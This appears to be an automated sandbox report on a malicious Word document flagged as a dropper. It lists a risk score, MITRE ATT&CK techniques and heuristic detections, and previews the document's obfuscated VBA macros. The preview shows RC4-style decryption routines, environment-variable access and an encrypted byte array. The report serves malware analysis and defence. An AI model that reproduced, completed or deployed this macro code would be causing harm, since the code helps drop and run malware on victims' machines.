MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate or Decode Files or Information
T1071.001 Web Protocols
The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize GetObject and CallByName functions, and appear to perform XOR-based decryption on embedded data. The ClamAV detection 'Doc.Dropper.Agent-6517847-0' strongly suggests a dropper functionality, indicating the script's purpose is to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6517847-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6517847-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9189 bytes |
SHA-256: cf56c83e707b9ee2d94dc5a43db6b0ccbe11da56e6254f29388296a7ccb204e2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "InkEdit1, 0, 0, INKEDLib, InkEdit" Dim i41BE Private Function c7C(o05() As Byte, oB2E104(), yFD79A) On Error Resume Next Dim hBD7(0 To 255), f9DCD1, l283, g3B, k39 As Byte For f9DCD1 = 0 To 255 hBD7(f9DCD1) = oB2E104(f9DCD1) Next f9DCD1 = 0 For f9DCD1 = 0 To yFD79A l283 = n666FC7((l283 + 1), 256) g3B = n666FC7((g3B + hBD7(l283)), 256) k39 = hBD7(l283) hBD7(l283) = hBD7(g3B) hBD7(g3B) = k39 o05(f9DCD1) = i472E14(o05(f9DCD1), (hBD7(n666FC7((hBD7(l283) + hBD7(g3B)), 256)))) Next f9DCD1 c7C = StrConv(o05, 64) End Function Private Function bCEAD(qF23, zFC8B4) Open qF23 For Output As #1 Print #1, zFC8B4 Close #1 End Function Private Function i472E14(k9DA6B, r7C1) i472E14 = (k9DA6B And Not r7C1) Or (Not k9DA6B And r7C1) End Function Private Function mA93D2(gB08150) mA93D2 = Environ(gB08150) End Function Sub iADA19() Dim o8F2EE(5) As Byte o8F2EE(4) = 55 o8F2EE(2) = 48 o8F2EE(1) = 65 o8F2EE(3) = 56 o8F2EE(5) = 54 o8F2EE(0) = 48 Dim gCC3CF(254) As Byte gCC3CF(65) = 126 gCC3CF(143) = 131 gCC3CF(28) = 246 gCC3CF(95) = 5 gCC3CF(232) = 35 gCC3CF(181) = 244 gCC3CF(223) = 70 gCC3CF(184) = 212 gCC3CF(41) = 31 gCC3CF(137) = 110 gCC3CF(166) = 169 gCC3CF(57) = 35 gCC3CF(64) = 165 gCC3CF(46) = 5 gCC3CF(217) = 161 gCC3CF(128) = 123 gCC3CF(185) = 154 gCC3CF(136) = 1 gCC3CF(2) = 198 gCC3CF(12) = 107 gCC3CF(147) = 140 gCC3CF(18) = 77 gCC3CF(9) = 114 gCC3CF(14) = 169 gCC3CF(97) = 138 gCC3CF(218) = 237 gCC3CF(173) = 228 gCC3CF(53) = 98 gCC3CF(179) = 202 gCC3CF(63) = 24 gCC3CF(145) = 134 gCC3CF(235) = 227 gCC3CF(100) = 164 gCC3CF(59) = 167 gCC3CF(16) = 157 gCC3CF(133) = 195 gCC3CF(160) = 46 gCC3CF(183) = 210 gCC3CF(11) = 114 gCC3CF(104) = 212 gCC3CF(7) = 138 gCC3CF(119) = 216 gCC3CF(191) = 140 gCC3CF(244) = 109 gCC3CF(88) = 4 gCC3CF(91) = 233 gCC3CF(24) = 104 gCC3CF(106) = 58 gCC3CF(30) = 16 gCC3CF(114) = 151 gCC3CF(20) = 167 gCC3CF(192) = 44 gCC3CF(153) = 120 gCC3CF(155) = 4 gCC3CF(225) = 85 gCC3CF(161) = 99 gCC3CF(125) = 79 gCC3CF(197) = 91 gCC3CF(205) = 216 gCC3CF(89) = 96 gCC3CF(0) = 70 gCC3CF(110) = 186 gCC3CF(249) = 213 gCC3CF(8) = 145 gCC3CF(105) = 22 gCC3CF(108) = 14 gCC3CF(126) = 116 gCC3CF(1) = 180 gCC3CF(54) = 4 gCC3CF(10) = 213 gCC3CF(15) = 2 gCC3CF(214) = 85 gCC3CF(107) = 194 gCC3CF(90) = 146 gCC3CF(6) = 209 gCC3CF(5) = 77 gCC3CF(19) = 53 gCC3CF(222) = 78 gCC3CF(233) = 77 gCC3CF(39) = 139 gCC3CF(240) = 109 gCC3CF(208) = 51 gCC3CF(247) = 50 gCC3CF(149) = 206 gCC3CF(51) = 161 gCC3CF(229) = 223 gCC3CF(203) = 86 gCC3CF(167) = 31 gCC3CF(44) = 229 gCC3CF(81) = 86 gCC3CF(66) = 253 gCC3CF(226) = 51 gCC3CF(40) = 150 gCC3CF(210) = 227 gCC3CF(79) = 77 gCC3CF(115) = 73 gCC3CF(98) = 86 gCC3CF(101) = 154 gCC3CF(162) = 244 gCC3CF(220) = 115 gCC3CF(94) = 205 gCC3CF(58) = 76 gCC3CF(238) = 168 gCC3CF(228) = 128 gCC3CF(123) = 46 gCC3CF(42) = 167 gCC3CF(144) = 69 gCC3CF(158) = 192 gCC3CF(4) = 111 gCC3CF(72) = 250 gCC3CF(17) = 243 gCC3CF(99) = 23 gCC3CF(177) = 111 gCC3CF(71) = 245 gCC3CF(224) = 91 gCC3CF(86) = 117 gCC3CF(172) = 192 gCC3CF(78) = 67 gCC3CF(159) = 169 gCC3CF(50) = 228 gCC3CF(25) = 57 gCC3CF(170) = 183 gCC3CF(178) = 113 gCC3CF(174) = 139 gCC3CF(234) = 119 gCC3CF(142) = 116 gCC3CF(129) = 119 gCC3CF(87) = 185 gCC3CF(85) = 224 gCC3CF(67) = 52 gCC3CF(118) = 5 gCC3CF(189) = 5 gCC3CF(248) = 23 gCC3CF(56) = 138 gCC3CF(60) = 115 gCC3CF(165) = 59 gCC3CF(37) = 210 gCC3CF(62) = 187 gCC3CF(198) = 33 gCC3CF(84) = 236 gCC3CF(168) = 238 gCC3CF(227) = 25 gCC3CF(152) = 37 gCC3CF(213) = 168 gCC3CF(242) = 234 gCC3CF(243) = 126 gCC3CF(176) = 224 gCC3CF(70) = 65 gCC3CF(29) = 241 gCC3CF(236) = 44 gCC3CF(141) = 117 gCC3CF(237) = 187 gCC3CF(45) = 169 gCC3CF(75) = 123 gCC3CF( ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.